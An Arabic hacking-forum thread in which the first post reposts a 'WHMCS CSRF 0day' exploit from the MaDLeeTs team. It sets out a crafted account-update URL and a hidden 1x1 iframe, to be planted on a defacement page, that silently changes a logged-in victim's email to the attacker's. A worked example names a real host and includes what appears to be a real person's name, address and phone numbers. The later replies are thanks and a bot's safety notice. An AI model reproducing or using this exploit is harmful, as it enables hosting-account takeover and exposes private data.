الوسوم:
حالة الموضوع:
مغلق
  1. G.e.r.n.a.s

    G.e.r.n.a.s Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    32
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    مبرمج
    الإقامة:
    قائمة الابداع
    كود PHP:
    ################################################## #########################

    # Exploit Title: WHMCS [CSRF] All Versions (0day)
    # Team: MaDLeeTs
    # Software Link: http://www.whmcs.com
    # Version: All
    # Site: http://www.MaDLeeTs.com
    # Email: LeeTHaXorY7Mail.com

    #######################Video###################### #################

    http://vimeo.com/63686629

    ################################################## #########################

    https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname= Max&lastname=Fong&companyname=Antswork+Communicati ons+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=W ilayah+Persekutuan&postcode=57000&country=MY&phone number=0060390592663&paymentmethod=none&billingcid =0&customfield[1][email protected]&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpu r+Tel:+603.86560268+Fax:+603.8​6560768

    ########################iFrame Code To Add On Deface##############################

    <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe>

    Example:
    <
    IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname= Max&lastname=Fong&companyname=Antswork+Communicati ons+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1= B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2 F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&stat e=Wilayah+Persekutuan&postcode=57000&country=MY&ph onenumber=0060390592663&paymentmethod=none&billing cid=0&customfield%5B1%5D=max%40antswork.com&custom field%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&c ustomfield%5B4%5D=%2B603.90578663&customfield%5B5% 5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&cu stomfield%5B7%5D=&customfield%5B8%5D=&customfield% 5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lum pur+Tel%3A+603.86560268+Fax%3A​+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe>

    ################################################## #########################
    All you need to do is add it into your Deface page and make your target view the deface pageHe MUST loggin 1st into his clientarea in order to get his email updated.
    ################################################## #########################
    Greetz to H4x0rL1f3 KhantastiC HaXor H4x0r HuSsY b0x Invectus Shadow008 Neo HaXor Hitcher Dr.Z0mbie Hmei7 phpBugz MindCracker |
    c0rrupt r00x Pain006 Ment@l Mind M4DSh4k H1d@lG0 AlphaSky 3thicaln00b e0fx madc0de |
    makman DeaTh AnGeL Lnxr00t x3o-1337 Tor Demon T4p10N AL.MaX HaCkEr | | ThaRude ThaDark |
    Evil-DZ H3ll-dz Over-3xp1r3 Cyber Army Pakistan Cyber Army And All MaDLeeTs TeaM Members
    ################################################## #########################

    http://www.MaDLeeTs.com

    ################################################## #########################


    I hope my exploit would be addedThank you WHMCS CSRF Versions Vulnerability

    [NOTE]WHMCS [CSRF] All Versions (0day) on Vimeo[/NOTE]​
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ارهابي انا

    ارهابي انا Developer

    الأنتساب:
    ‏25 مارس 2012
    المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    أمام الجهاز 24 ساعة
    رد: WHMCS [CSRF] All Versions (0day)

    يعطيك العافيه يابطل واصل ..^^​
     
  4. mr.mourad

    mr.mourad <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏8 يوليو 2013
    المشاركات:
    170
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    رد: WHMCS [CSRF] All Versions (0day)

    يعطيك العافية اخي شكراً جزيلاً :{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة